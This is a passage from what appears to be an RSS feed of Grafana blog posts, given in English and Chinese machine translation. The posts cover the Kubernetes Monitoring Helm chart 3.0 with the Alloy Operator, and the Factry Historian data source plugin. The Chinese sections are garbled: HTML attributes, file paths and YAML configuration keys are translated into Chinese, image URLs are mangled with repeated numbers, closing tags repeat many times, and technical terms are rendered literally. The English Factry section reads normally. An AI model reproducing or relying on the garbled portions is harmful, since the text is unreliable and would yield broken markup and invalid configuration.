&lt;/code&gt; -Type目的地。在3.0之前，这需要配置Kubernetes监视头盔图和至少一个或多个其他合金实例之间的复杂交互。尾巴采样允许使用各种策略“采样”痕迹。常见选项包括基于百分比，状态代码或跨度属性的过滤。尾部采样在目的地下启用：&lt;/p&gt;&#xA;&lt;div class =“ code-snippet code-snippet__mini”&gt; &lt;div class =“ lang-toolbar__mini”&gt;&#xA;&lt;span class =“ code-clipboard”&gt;&#xA;&lt;button x-data =“ app_code_snippet（）” x-init =“ init（）” @click =“ copy（）”&gt;&#xA;&lt;img class =“ code-clipboard__icon” src =“/媒体/images/icons/icon-copy-small-2.svg” alt =“复制代码到剪贴板” width =“ 14”高度=“ 13”&gt;&#xA;&lt;span&gt;复制&lt;/span&gt;&#xA;&lt;/button&gt;&#xA;&lt;/span&gt;&#xA;&lt;/div&gt; &lt;div class =“代码 - 尼珀代码snippet__border”&gt;&#xA;&lt;pre data-expanded =“ false”&gt; &lt;code class =“ language-none”&gt;目的地：&#xA; - 名称：节奏&#xA;类型：OTLP&#xA;URL：tempo.tempo.svc：4317&#xA;痕迹：{启用：true}&#xA;处理器：&#xA;尾巴采样：&#xA;启用：true &lt;/code&gt; &lt;/pre&gt;&#xA;&lt;/div&gt;&#xA;&lt;/div&gt; &lt;p&gt;这将自动部署正确应用您的尾巴采样策略所需的额外合金实例，然后再运送到原始预期的目的地。没有合金操作员，这种动态部署是不可能的。&lt;/p&gt;&#xA;在&#xA;&lt;p&gt;合金操作员是一个基于头盔的小脚印运算符&#xA;&lt;a href =“ https://sdk.operatorframework.io/docs/building-operators/helm/” target =“ _ blank” rel =“ noopener noreferrer”&gt; operator sdk &lt;/a&gt;。合金运算符无需使用合金实例和头盔图表，而是对&lt;code&gt;类型进行作用：Alloy &lt;/code&gt;对象。当Kubernetes监视头盔图将合金对象部署到群集时，合金操作员：&lt;/p&gt;&#xA;&lt;ol&gt;&#xA;&lt;li&gt;创建对象所需的组件（例如文件系统访问，权限或读取秘密的功能）&lt;/li&gt;&#xA;&lt;li&gt;执行合金对象及其组件的头盔安装&lt;/li&gt;&#xA;&lt;/ol&gt;&#xA;&lt;p&gt;要查看已安装的内容，您可以使用&lt;code&gt; helm List &lt;/代码&gt;命令。该图显示了截至3.0的所有可用合金对象。&lt;/p&gt;&#xA;&lt;图&#xA;class =“ figup-wrapper figuper-wrapper__lightbox W-100P”&#xA;样式=“最大宽度：1506px;”&#xA;itemprop =“ iSsectedmedia”&#xA;itemScope =“”&#xA;itemType =“ http://schema.org/imageObject”&#xA;&gt; &lt;a&#xA;class =“ Lightbox-link”&#xA;href =“/媒体/博客/合金操作器/workflow.png”&#xA;itemprop =“ contenturl”&#xA;&gt; &lt;div class =“ img-wrapper W-100P H-auto”&gt; &lt;img&#xA;class =“ Lazyload”&#xA;data-src =“/媒体/blog/yloy-operator/workflow.png” data-srcset =“/媒体/blog/alloy-operator/workflow.w = 320 320w，/media/media/blog/alloy-operator/workerator/workflow.png.png = w = 550 550 550 550 550 550 550 550 550 550 550 70 /media/blog/alloy-operator/workflow.png?w=900 900w, /media/blog/alloy-operator/workflow.png?w=1040 1040w, /media/blog/alloy-operator/workflow.png?w=1240 1240w, /media/blog/alloy-operator/workflow.png?w=1920 1920W”&#xA;data-sizes =“ auto” alt =“” width =“ 1506”高=“ 1124”/&gt;&#xA;&lt;NoScript&gt;&#xA;&lt;img&#xA;src =“/媒体/博客/合金操作器/workflow.png”&#xA;alt =“” width =“ 1506”高度=“ 1124”/&gt;&#xA;&lt;/noscript&gt; &lt;/div&gt; &lt;/a&gt; &lt;/figie&gt;&#xA;在&#xA;&lt;p&gt; Helm Chart 3.0遵循与以前版本相同的最佳实践，并确保&#xA;&lt;a href =“ https://www.twingate.com/blog/glossary/encapsulation” target =“ _ blank” rel =“ noopener noreferrer”&gt;封装&lt;/a&gt;以保持模块化和安全性。这意味着每个对象，无论是合金，节点导出器还是循环，都仅限于执行其函数所需的权限。&lt;/p&gt;&#xA;&lt;h3 id =“从helm图表v1 v1 &lt;/h3&gt;升级升级 - 升级 -  helm-chart-v1”&gt;&#xA;&lt;p&gt;即使进行了所有这些更改，我们仍在尽力使迁移尽可能简单。 V1的大多数设置将直接映射到V2中的设置。另外，您可以参考&#xA;&lt;a href=&#34;https://github.com/grafana/k8s-monitoring-helm/blob/main/charts/k8s-monitoring/docs/Migration.md&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;migration guide&lt;/a&gt; to help show how to do that.我们也正在建造一个&#xA;&lt;a href =“ https://grafana.github.io/k8s-monitoring-helm-migator/” target =“ _ blank” rel =“ noopener noreferrer”&gt;迁移实用程序&#xA;&lt;h3 id =“升级 - 升级 -  helm-chart-v2x”&gt;从Helm图表v2.x &lt;/h3&gt;升级&#xA;&lt;p&gt;合金操作员需要使用新的合金CRD，仅应用于新的安装。通过升级，您必须首先部署CRD。 Kubernetes监视头盔图将检测是否需要CRD，并将打印CRD的位置进行安装。或者，您可以从&#xA;&lt;a href =“ https://github.com/grafana/alloy-operator/releases” target =“ _ blank” rel =“ noopener noreferrer”&gt;合金操作员发行&lt;/a&gt;，并将其应用于&lt;code&gt; kubectl &lt;/code&gt;。&lt;/p&gt;。&lt;/p&gt;。&lt;/p&gt;。&lt;/p&gt;。&lt;/p&gt;。&lt;/p&gt;。&lt;/p&gt;。&lt;/p&gt;。&lt;/p&gt;。&lt;/p&gt;。&lt;/p&gt;。&lt;/p&gt;。&lt;/p&gt;。&#xA;&lt;H2 ID =“反馈”&gt;反馈&lt;/h2&gt;&#xA;&lt;p&gt;我们喜欢收到您的来信！所有更改&#xA;&lt;a href =“ https://github.com/grafana/k8s-monitoring-helm/tree/main/main/charts/k8s-Monitoring“ target =” _ blank“ rel =“ noopener noreferrer”&gt; kubernetes监视监视掌舵图表&lt;/a&gt;和合金操作员的创建受到反馈的启发，我们从我们惊人的社区中听到的评论启发了我们从我们的惊人社区那里听到的。参加我们的一个&#xA;&lt;a href =“ https://github.com/grafana/k8s-monitoring-helm#office-hours” target =“ _ blank” rel =“ noopener noreferrer”&gt; k8s-monoritoring Helm Chart Office Chart Office Hourpe &lt;/a&gt;。&lt;/a&gt;。&lt;/p&gt;。&lt;/p&gt;。&#xA;&lt;p&gt; &lt;em&gt;&#xA;&lt;a href =“/products/cloud/？pg = blog＆plcmt = body-txt”&gt; grafana cloud &lt;/a&gt;是从指标，日志，痕迹，痕迹，仪表板等开始的最简单方法。我们有一个宽敞的永远的层次，并为每个用例都有计划。&#xA;&lt;a href =“//auth/ign-up/create-user/？pg = blog＆plcmt = body-txt”&gt;现在免费注册&lt;/a&gt;！&lt;/em&gt; &lt;/em&gt; &lt;/p&gt;</description>
      <pubDate>Tue, 17 Jun 2025 00:00:00 +0000</pubDate>
    </item>
    <item>
      <title>【How the Factry Historian data source for Grafana enables data-driven insights for factory teams】Grafana的Factry历史学家数据源如何为工厂团队提供数据驱动的见解</title>
      <link>https://grafana.com/blog/2025/06/20/how-the-factry-historian-data-source-for-grafana-enables-data-driven-insights-for-factory-teams/</link>
      <description>【&lt;p&gt;&lt;em&gt;Frederik Van Leeckwyck is the co-founder and CRO at Factry. He oversees go-to-market activities and ensures their software solutions align with real factory demands. Passionate about open technologies, he believes in making data-driven insights accessible to everyone in the factory.&lt;/em&gt;&lt;/p&gt;&#xA;&lt;p&gt;Factories today are often rich in process data, but poor in insights. Despite generating massive volumes of time-series data from thousands of machines, much of that data remains locked away, accessible only to technical experts. Operators, engineers, and decision-makers struggle to extract the right information when they need it. &lt;/p&gt;&#xA;&lt;p&gt;In this blog post, we’ll explore how the&#xA;&lt;a href=&#34;/grafana/plugins/factry-historian-datasource/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;Factry Historian data source plugin for Grafana&lt;/a&gt; addresses this challenge. By extending Grafana with industrial data capabilities, factories can turn raw sensor data into clear, visual insights.&lt;/p&gt;&#xA;&lt;p&gt;“Templated dashboards powered by Factry Historian’s data source plugin for Grafana enable us to streamline operations,” said Baptist Berlamont, data engineer at Agristo, a company that specializes in the production and distribution of frozen potato products. “We can now track our batch performance across our equipment instantly, saving time and driving smarter, data-driven decisions.”&lt;/p&gt;&#xA;&lt;p&gt;Read on to learn more about how Grafana and Factry Historian enable seamless data access and analysis — from the shop floor to the boardroom — and how you can get started using the data source today.&lt;/p&gt;&#xA;&lt;h2 id=&#34;factry-historian--grafana-opening-up-data-driven-insights&#34;&gt;Factry Historian + Grafana: opening up data-driven insights&lt;/h2&gt;&#xA;&lt;p&gt;Industrial companies, particularly in the process industry, rely on instrumented production processes controlled by&#xA;&lt;a href=&#34;https://en.wikipedia.org/wiki/Programmable_logic_controller&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;PLCs&lt;/a&gt; and&#xA;&lt;a href=&#34;https://en.wikipedia.org/wiki/SCADA&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;SCADA&lt;/a&gt; systems. These systems generate enormous volumes of time-series data from tens of thousands of sensors, continuously monitoring process conditions. Yet, turning this data into actionable insights remains a significant hurdle.&lt;/p&gt;&#xA;&lt;p&gt;Traditionally, accessing and analyzing production data has been restricted to a handful of engineers using vendor-locked historian software. Historians are specialized databases designed to collect, store, and retrieve time-series data from industrial processes. They are optimized for high-speed data logging and are commonly used to track sensor values, machine states, and other critical metrics over time. &lt;/p&gt;&#xA;&lt;p&gt;Due to these systems’ complexity and licensing constraints, non-technical users (such as process engineers, operators, and quality teams) are often left without direct access to data, limiting their ability to make informed decisions.&lt;/p&gt;&#xA;&lt;p&gt;At&#xA;&lt;a href=&#34;https://www.factry.io/&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;Factry&lt;/a&gt;, we build modern historian software with a strong focus on ease of use. By using open source components, we create flexible, vendor-neutral solutions that are intuitive enough for anyone to use, without needing deep technical skills. Our goal is to make visual process insights accessible to every role in the factory, from operators to the board room. More users require access to drive process improvements and solve operational challenges, including the ones without technical expertise.&lt;/p&gt;&#xA;&lt;p&gt;For years now, Factry&#xA;&lt;a href=&#34;https://coussej.github.io/2016/04/18/Building-An-Open-Source-Process-Historian/&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;has been a strong advocate&lt;/a&gt; for Grafana in industrial environments. As Grafana provides great support for time-series visualization, it’s a natural fit for analyzing large volumes of operational data.&lt;/p&gt;&#xA;&lt;h2 id=&#34;the-challenge-simplifying-time-series-data-exploration&#34;&gt;The challenge: simplifying time-series data exploration&lt;/h2&gt;&#xA;&lt;p&gt;Unlocking process data is one thing. Making sense of it is another. Industrial teams often face challenges in efficiently retrieving and contextualizing time-series data due to the way it’s structured in many historian systems and databases.&lt;/p&gt;&#xA;&lt;p&gt;Common challenges when working with time-series data in plants include:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;&lt;strong&gt;Flat data structures&lt;/strong&gt; make it difficult to locate relevant metrics among thousands of collected values.&lt;/li&gt;&#xA;&lt;li&gt;&lt;strong&gt;Tag-based organization in time-series databases&lt;/strong&gt; can introduce continuity issues, such as broken time series when asset structures change.&lt;/li&gt;&#xA;&lt;li&gt;&lt;strong&gt;Default query behavior&lt;/strong&gt; can lead to misleading results, such as averaging data across multiple sensors instead of just one.&lt;/li&gt;&#xA;&lt;li&gt;&lt;strong&gt;Complex query languages&lt;/strong&gt; (such as Flux or SQL) can be overwhelming for factory users who lack programming skills.&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;Moreover, simply storing and visualizing time-series data just isn’t enough for industrial power users. They also need:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;&lt;strong&gt;Hierarchical browsing&lt;/strong&gt;. An&#xA;&lt;a href=&#34;https://www.isa.org/standards-and-publications/isa-standards/isa-88-standards&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;ISA88/95&lt;/a&gt;-style equipment model to navigate data in a structured tree, instead of memorizing tag names.&lt;/li&gt;&#xA;&lt;li&gt;&lt;strong&gt;Automated metadata handling&lt;/strong&gt;. Loading units of measurement, scaling, and HI/LO boundaries automatically so data is displayed meaningfully.&lt;/li&gt;&#xA;&lt;li&gt;&lt;strong&gt;Advanced event overlaying&lt;/strong&gt;. The option to layer production events on top of time-series data, enabling deeper process analysis.&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;h2 id=&#34;the-solution-the-factry-historian-data-source-for-grafana&#34;&gt;The solution: the Factry Historian data source for Grafana&lt;/h2&gt;&#xA;&lt;p&gt;To tackle these challenges, Factry built the Factry Historian data source plugin for Grafana. &lt;/p&gt;&#xA;&lt;p&gt;By combining&#xA;&lt;a href=&#34;https://www.factry.io/historian/&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;Factry Historian&lt;/a&gt; with Grafana functionality in industrial environments, the data source offers an intuitive way for both technical and non-technical users to explore and analyze their data. &lt;/p&gt;&#xA;&lt;p&gt;Users benefit from Grafana’s powerful visualization capabilities, &lt;strong&gt;augmented with industry-specific requirements&lt;/strong&gt; to reflect real-world factory operations. &lt;/p&gt;&#xA;&lt;p&gt;The data source offers the following features to simplify how teams interact with their process data, reducing complexity and making insights accessible to more users.&lt;/p&gt;&#xA;&lt;h3 id=&#34;1-browsing-measurements-according-to-an-asset-structure&#34;&gt;1. Browsing measurements according to an asset structure&lt;/h3&gt;&#xA;&lt;p&gt;Because data in Factry Historian is structured according to an asset hierarchy, Grafana users can browse this structure quickly to find relevant data, without having to remember complex tag names. For example, in the screenshot below, we’re browsing an asset hierarchy by &lt;strong&gt;Enterprise&lt;/strong&gt; &amp;gt; &lt;strong&gt;Site&lt;/strong&gt; &amp;gt; &lt;strong&gt;Area&lt;/strong&gt; &amp;gt; &lt;strong&gt;Equipment&lt;/strong&gt; &amp;gt; &lt;strong&gt;Tag&lt;/strong&gt;.&lt;/p&gt;&#xA;&lt;figure&#xA;class=&#34;figure-wrapper figure-wrapper__lightbox w-100p &#34;&#xA;style=&#34;max-width: 1999px;&#34;&#xA;itemprop=&#34;associatedMedia&#34;&#xA;itemscope=&#34;&#34;&#xA;itemtype=&#34;http://schema.org/ImageObject&#34;&#xA;&gt;&lt;a&#xA;class=&#34;lightbox-link&#34;&#xA;href=&#34;/media/blog/factry-historian-data-source/asset-structure-1.png&#34;&#xA;itemprop=&#34;contentUrl&#34;&#xA;&gt;&lt;div class=&#34;img-wrapper w-100p h-auto&#34;&gt;&lt;img&#xA;class=&#34;lazyload &#34;&#xA;data-src=&#34;/media/blog/factry-historian-data-source/asset-structure-1.png&#34;data-srcset=&#34;/media/blog/factry-historian-data-source/asset-structure-1.png?w=320 320w, /media/blog/factry-historian-data-source/asset-structure-1.png?w=550 550w, /media/blog/factry-historian-data-source/asset-structure-1.png?w=750 750w, /media/blog/factry-historian-data-source/asset-structure-1.png?w=900 900w, /media/blog/factry-historian-data-source/asset-structure-1.png?w=1040 1040w, /media/blog/factry-historian-data-source/asset-structure-1.png?w=1240 1240w, /media/blog/factry-historian-data-source/asset-structure-1.png?w=1920 1920w&#34;&#xA;data-sizes=&#34;auto&#34;alt=&#34;A screenshot of a dashboard showing how you can browse measurements according to asset structure.&#34;width=&#34;1999&#34;height=&#34;1022&#34;/&gt;&#xA;&lt;noscript&gt;&#xA;&lt;img&#xA;src=&#34;/media/blog/factry-historian-data-source/asset-structure-1.png&#34;&#xA;alt=&#34;A screenshot of a dashboard showing how you can browse measurements according to asset structure.&#34;width=&#34;1999&#34;height=&#34;1022&#34;/&gt;&#xA;&lt;/noscript&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&#xA;&lt;p&gt;Since the &lt;strong&gt;Units of Measurement&lt;/strong&gt; are configured in Factry Historian, they are automatically loaded into Grafana. For example, if your sensor measures temperature in °C, the system can also supply associated &lt;strong&gt;min and max values&lt;/strong&gt; (such as 0 °C – 250 °C) and &lt;strong&gt;HI/LO boundaries&lt;/strong&gt;. This way, you can easily configure Grafana to show thresholds that are meaningful to your process.&lt;/p&gt;&#xA;&lt;figure&#xA;class=&#34;figure-wrapper figure-wrapper__lightbox w-100p &#34;&#xA;style=&#34;max-width: 1999px;&#34;&#xA;itemprop=&#34;associatedMedia&#34;&#xA;itemscope=&#34;&#34;&#xA;itemtype=&#34;http://schema.org/ImageObject&#34;&#xA;&gt;&lt;a&#xA;class=&#34;lightbox-link&#34;&#xA;href=&#34;/media/blog/factry-historian-data-source/asset-structure-2.png&#34;&#xA;itemprop=&#34;contentUrl&#34;&#xA;&gt;&lt;div class=&#34;img-wrapper w-100p h-auto&#34;&gt;&lt;img&#xA;class=&#34;lazyload &#34;&#xA;data-src=&#34;/media/blog/factry-historian-data-source/asset-structure-2.png&#34;data-srcset=&#34;/media/blog/factry-historian-data-source/asset-structure-2.png?w=320 320w, /media/blog/factry-historian-data-source/asset-structure-2.png?w=550 550w, /media/blog/factry-historian-data-source/asset-structure-2.png?w=750 750w, /media/blog/factry-historian-data-source/asset-structure-2.png?w=900 900w, /media/blog/factry-historian-data-source/asset-structure-2.png?w=1040 1040w, /media/blog/factry-historian-data-source/asset-structure-2.png?w=1240 1240w, /media/blog/factry-historian-data-source/asset-structure-2.png?w=1920 1920w&#34;&#xA;data-sizes=&#34;auto&#34;alt=&#34;A screenshot of a dashboard demonstrating how you can configure Grafana to show thresholds.&#34;width=&#34;1999&#34;height=&#34;1020&#34;/&gt;&#xA;&lt;noscript&gt;&#xA;&lt;img&#xA;src=&#34;/media/blog/factry-historian-data-source/asset-structure-2.png&#34;&#xA;alt=&#34;A screenshot of a dashboard demonstrating how you can configure Grafana to show thresholds.&#34;width=&#34;1999&#34;height=&#34;1020&#34;/&gt;&#xA;&lt;/noscript&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&#xA;&lt;h3 id=&#34;2-making-dashboards-reusable-by-using-grafana-variables&#34;&gt;2. Making dashboards reusable by using Grafana variables&lt;/h3&gt;&#xA;&lt;p&gt;&#xA;&lt;a href=&#34;/docs/grafana/latest/dashboards/variables/&#34;&gt;Dashboard variables&lt;/a&gt; are a powerful Grafana feature, especially in an industrial context. Production companies often have multiple similar production lines or reactors, and they want to follow up on them in a consistent manner. By leveraging Grafana variables, you can build a dashboard once and reuse it for different equipment.&lt;/p&gt;&#xA;&lt;p&gt;The Factry Historian data source for Grafana supports variables corresponding to different Factry Historian elements:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;&lt;strong&gt;Asset&lt;/strong&gt;: Select a parent asset from your configured asset structure.&lt;/li&gt;&#xA;&lt;li&gt;&lt;strong&gt;Asset Property&lt;/strong&gt;: Suppose each reactor has “Temperature,” “Pressure,” and “Energy use” properties. These would appear in a dropdown.&lt;/li&gt;&#xA;&lt;li&gt;&lt;strong&gt;Event Type&lt;/strong&gt;: If Factry Historian is set to detect batches and downtime events, those appear in the dropdown.&lt;/li&gt;&#xA;&lt;li&gt;&lt;strong&gt;Event Type Property&lt;/strong&gt;: For each batch, you might store batchID, recipe, yeast strain—these properties are loaded in the dropdown.&lt;/li&gt;&#xA;&lt;li&gt;&lt;strong&gt;Measurement&lt;/strong&gt;: Generates a filterable list of measurements from Factry Historian.&lt;/li&gt;&#xA;&lt;li&gt;&lt;strong&gt;Database&lt;/strong&gt;: In case multiple time-series databases are in use (perhaps across different sites), you can filter or select which database to query.&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;figure&#xA;class=&#34;figure-wrapper figure-wrapper__lightbox w-100p &#34;&#xA;style=&#34;max-width: 1999px;&#34;&#xA;itemprop=&#34;associatedMedia&#34;&#xA;itemscope=&#34;&#34;&#xA;itemtype=&#34;http://schema.org/ImageObject&#34;&#xA;&gt;&lt;a&#xA;class=&#34;lightbox-link&#34;&#xA;href=&#34;/media/blog/factry-historian-data-source/support-for-variables.png&#34;&#xA;itemprop=&#34;contentUrl&#34;&#xA;&gt;&lt;div class=&#34;img-wrapper w-100p h-auto&#34;&gt;&lt;img&#xA;class=&#34;lazyload &#34;&#xA;data-src=&#34;/media/blog/factry-historian-data-source/support-for-variables.png&#34;data-srcset=&#34;/media/blog/factry-historian-data-source/support-for-variables.png?w=320 320w, /media/blog/factry-historian-data-source/support-for-variables.png?w=550 550w, /media/blog/factry-historian-data-source/support-for-variables.png?w=750 750w, /media/blog/factry-historian-data-source/support-for-variables.png?w=900 900w, /media/blog/factry-historian-data-source/support-for-variables.png?w=1040 1040w, /media/blog/factry-historian-data-source/support-for-variables.png?w=1240 1240w, /media/blog/factry-historian-data-source/support-for-variables.png?w=1920 1920w&#34;&#xA;data-sizes=&#34;auto&#34;alt=&#34;A screenshot of a Grafana dashboard using variables. &#34;width=&#34;1999&#34;height=&#34;838&#34;/&gt;&#xA;&lt;noscript&gt;&#xA;&lt;img&#xA;src=&#34;/media/blog/factry-historian-data-source/support-for-variables.png&#34;&#xA;alt=&#34;A screenshot of a Grafana dashboard using variables. &#34;width=&#34;1999&#34;height=&#34;838&#34;/&gt;&#xA;&lt;/noscript&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&#xA;&lt;h3 id=&#34;3-adding-annotations-for-quick-visual-overviews&#34;&gt;3. Adding annotations for quick visual overviews&lt;/h3&gt;&#xA;&lt;p&gt;Annotations let you place contextual information in the form of a line or region on a Grafana graph. This allows you to quickly correlate production events with process trends, accelerating root cause analysis. &lt;/p&gt;&#xA;&lt;p&gt;In industrial applications, you might have:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;A &lt;strong&gt;downtime event&lt;/strong&gt; you want to highlight with a failure reason, or&lt;/li&gt;&#xA;&lt;li&gt;A &lt;strong&gt;batch production cycle&lt;/strong&gt; you annotate with batchID or recipe.&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;With the Factry Historian data source plugin, a user can quickly select an event (for example, a downtime event) and retrieve its batchID or recipe fields. Those then show up as annotations directly on the time-series trends in Grafana.&lt;/p&gt;&#xA;&lt;figure&#xA;class=&#34;figure-wrapper figure-wrapper__lightbox w-100p &#34;&#xA;style=&#34;max-width: 1999px;&#34;&#xA;itemprop=&#34;associatedMedia&#34;&#xA;itemscope=&#34;&#34;&#xA;itemtype=&#34;http://schema.org/ImageObject&#34;&#xA;&gt;&lt;a&#xA;class=&#34;lightbox-link&#34;&#xA;href=&#34;/media/blog/factry-historian-data-source/annotations.png&#34;&#xA;itemprop=&#34;contentUrl&#34;&#xA;&gt;&lt;div class=&#34;img-wrapper w-100p h-auto&#34;&gt;&lt;img&#xA;class=&#34;lazyload &#34;&#xA;data-src=&#34;/media/blog/factry-historian-data-source/annotations.png&#34;data-srcset=&#34;/media/blog/factry-historian-data-source/annotations.png?w=320 320w, /media/blog/factry-historian-data-source/annotations.png?w=550 550w, /media/blog/factry-historian-data-source/annotations.png?w=750 750w, /media/blog/factry-historian-data-source/annotations.png?w=900 900w, /media/blog/factry-historian-data-source/annotations.png?w=1040 1040w, /media/blog/factry-historian-data-source/annotations.png?w=1240 1240w, /media/blog/factry-historian-data-source/annotations.png?w=1920 1920w&#34;&#xA;data-sizes=&#34;auto&#34;alt=&#34;A screenshot of a Grafan dashboard featuring annotations.&#34;width=&#34;1999&#34;height=&#34;983&#34;/&gt;&#xA;&lt;noscript&gt;&#xA;&lt;img&#xA;src=&#34;/media/blog/factry-historian-data-source/annotations.png&#34;&#xA;alt=&#34;A screenshot of a Grafan dashboard featuring annotations.&#34;width=&#34;1999&#34;height=&#34;983&#34;/&gt;&#xA;&lt;/noscript&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&#xA;&lt;h2 id=&#34;success-story-self-service-analytics-at-agristo&#34;&gt;Success story: Self-service analytics at Agristo&lt;/h2&gt;&#xA;&lt;p&gt;Established in Belgium,&#xA;&lt;a href=&#34;https://agristo.com/&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;Agristo&lt;/a&gt; specializes in the production and distribution of frozen potato products. The company has a robust global presence, serving 680 clients across 145 countries and operating from 12 global sales offices. &lt;/p&gt;&#xA;&lt;p&gt;Before using Factry Historian and Grafana, it had been difficult for engineers and other stakeholders to access process data without OT and IT support. Now, Agristo uses the Factry Historian data source for Grafana to easily build, maintain, and deploy standardized ad-hoc dashboards. &lt;/p&gt;&#xA;&lt;p&gt;“To investigate an oil leakage, I quickly created a dashboard monitoring oil levels in tanks and ovens,” said Nathan Van der Eecken, process engineer at Agristo. “Early data shows that one oven is consuming 40% more than expected. Tracking this will help pinpoint the cause of the issue.”&lt;/p&gt;&#xA;&lt;figure&#xA;class=&#34;figure-wrapper figure-wrapper__lightbox w-100p &#34;&#xA;style=&#34;max-width: 6081px;&#34;&#xA;itemprop=&#34;associatedMedia&#34;&#xA;itemscope=&#34;&#34;&#xA;itemtype=&#34;http://schema.org/ImageObject&#34;&#xA;&gt;&lt;a&#xA;class=&#34;lightbox-link captioned&#34;&#xA;href=&#34;/media/blog/factry-historian-data-source/agristo-grafana-dashboards.jpg&#34;&#xA;itemprop=&#34;contentUrl&#34;&#xA;&gt;&lt;div class=&#34;img-wrapper w-100p h-auto&#34;&gt;&lt;img&#xA;class=&#34;lazyload mb-0&#34;&#xA;data-src=&#34;/media/blog/factry-historian-data-source/agristo-grafana-dashboards.jpg&#34;data-srcset=&#34;/media/blog/factry-historian-data-source/agristo-grafana-dashboards.jpg?w=320 320w, /media/blog/factry-historian-data-source/agristo-grafana-dashboards.jpg?w=550 550w, /media/blog/factry-historian-data-source/agristo-grafana-dashboards.jpg?w=750 750w, /media/blog/factry-historian-data-source/agristo-grafana-dashboards.jpg?w=900 900w, /media/blog/factry-historian-data-source/agristo-grafana-dashboards.jpg?w=1040 1040w, /media/blog/factry-historian-data-source/agristo-grafana-dashboards.jpg?w=1240 1240w, /media/blog/factry-historian-data-source/agristo-grafana-dashboards.jpg?w=1920 1920w&#34;&#xA;data-sizes=&#34;auto&#34;alt=&#34;A photo of a Nathan Van der Eecken, process engineer at Agristo, using Grafana dashboards.&#34;width=&#34;6081&#34;height=&#34;4054&#34;title=&#34;*Nathan Van der Eecken, process engineer at Agristo, where they use the Factry Historian data source for Grafana to build standardized ad-hoc dashboards.*&#34;/&gt;&#xA;&lt;noscript&gt;&#xA;&lt;img&#xA;src=&#34;/media/blog/factry-historian-data-source/agristo-grafana-dashboards.jpg&#34;&#xA;alt=&#34;A photo of a Nathan Van der Eecken, process engineer at Agristo, using Grafana dashboards.&#34;width=&#34;6081&#34;height=&#34;4054&#34;title=&#34;*Nathan Van der Eecken, process engineer at Agristo, where they use the Factry Historian data source for Grafana to build standardized ad-hoc dashboards.*&#34;/&gt;&#xA;&lt;/noscript&gt;&lt;/div&gt;&lt;figcaption class=&#34;w-100p caption text-gray-13 &#34;&gt;&lt;em&gt;Nathan Van der Eecken, process engineer at Agristo, where they use the Factry Historian data source for Grafana to build standardized ad-hoc dashboards.&lt;/em&gt;&lt;/figcaption&gt;&lt;/a&gt;&lt;/figure&gt;&#xA;&lt;p&gt;Users can now access data independently, getting crucial production data into the hands of everyone that needs it, without a query builder or editor.&lt;/p&gt;&#xA;&lt;p&gt;“With Factry Historian and Grafana, people can now engage with data, understand its meaning, and take actions to enhance operations,” said Van der Eecken. “It&amp;rsquo;s not just about monitoring processes, it&amp;rsquo;s about installing a culture of learning and improvement.” &lt;/p&gt;&#xA;&lt;p&gt;With a strong focus on sustainability, innovation, and operational excellence, Agristo’s use of Factry Historian and Grafana has helped them optimize production processes, improve efficiency, and streamline troubleshooting.&lt;/p&gt;&#xA;&lt;p&gt;“By making batch overlays in Grafana straightforward, the plugin enables us to correlate quality data with time-series data,” said Baptist Berlamont, data engineer at Agristo. “It has become indispensable for troubleshooting and improving our operations.” &lt;/p&gt;&#xA;&lt;h2 id=&#34;wrapping-up-and-next-steps&#34;&gt;Wrapping up and next steps&lt;/h2&gt;&#xA;&lt;p&gt;By combining Grafana’s powerful visualization platform with Factry Historian’s industrial data capabilities, manufacturers gain an accessible, flexible, and scalable solution for process data analysis.&lt;/p&gt;&#xA;&lt;p&gt;With the Factry data source plugin for Grafana, you can benefit from the following features to turn raw data into meaningful insights:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Structured asset browsing removes the need to memorize tag names.&lt;/li&gt;&#xA;&lt;li&gt;Reusable dashboards reduce setup time and standardize performance monitoring.&lt;/li&gt;&#xA;&lt;li&gt;Event overlays provide real-time context for better decision-making.&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;To learn more about the Factry Historian data source plugin for Grafana please check out this&#xA;&lt;a href=&#34;/grafana/plugins/factry-historian-datasource/&#34;&gt;overview page&lt;/a&gt;. You can explore and get started with Factry Historian by checking out this&#xA;&lt;a href=&#34;https://github.com/factrylabs/historian&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;GitHub repository&lt;/a&gt;, which includes a ready-to-use Docker Compose setup and helpful getting started guides.&lt;/p&gt;】&lt;p&gt; &lt;em&gt;弗雷德里克·范·莱克维克（Frederik Van Leeckwyck）是Factry的联合创始人和Cro。他监督上市活动，并确保其软件解决方案与实际工厂需求保持一致。他对开放技术充满热情，他相信工厂中每个人都可以访问数据驱动的见解。&lt;/em&gt; &lt;/p&gt;&#xA;&lt;p&gt;今天的工厂通常富含流程数据，但洞察力却很差。尽管从数千台机器中产生了大量的时间序列数据，但其中大部分数据仍然被锁定，只能被技术专家访问。运营商，工程师和决策者在需要时努力提取正确的信息。 &lt;/p&gt;&#xA;&lt;p&gt;在这篇博客文章中，我们将探讨如何&#xA;&lt;a href =“/grafana/plugins/factry-historian-datasource/？pg = blog＆plcmt = 